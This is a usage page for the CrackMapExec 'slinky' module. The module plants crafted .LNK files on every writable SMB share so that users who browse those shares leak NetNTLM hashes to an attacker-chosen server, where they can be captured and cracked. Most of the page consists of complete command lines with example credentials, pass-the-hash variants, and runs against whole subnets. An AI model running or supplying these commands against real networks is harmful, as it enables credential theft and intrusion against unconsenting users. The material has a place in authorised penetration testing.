CrackMapExec Slinky (smb)
This page contains detailed information about how to use the slinky CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module creates Windows shortcut (.LNK file) with specially crafted icon attribute on all remote writeable shares. The icon attribute points to an arbitrary UNC path - ideally the attacker's machine. Afterwards, anyone who visits the shared folder (with the .LNK file inside) will automatically try to authenticate against the specified SERVER (to load the icon) and send NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.
The slinky module is OPSEC unsafe which means that it may touch the disk and therefore can trigger an alarm.
Supported Protocols
- smb
Module Source Code
Authors
Module Options
Here is a complete list of slinky module options:
# cme smb -M slinky --options
[*] slinky module options:
SERVER IP of the SMB server
NAME LNK file name
CLEANUP Cleanup (choices: True or False)
The SERVER and NAME options are required! Make sure to set them when using this module.
Module Usage
This is how to use the slinky module while using the smb protocol:
Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M slinky -o SERVER=<host> -o NAME=<name>
Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M slinky -o SERVER=10.0.6.11 -o NAME=test
Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test
The slinky module can be also used against multiple hosts. Here's how to run it against multiple hosts:# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
References
- https://medium.com/@markmotig/capturing-hashes-with-hidden-folders-lnk-files-and-smbserver-by-markmo-a4ab87b7aa15
- https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/server/capture/smb
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.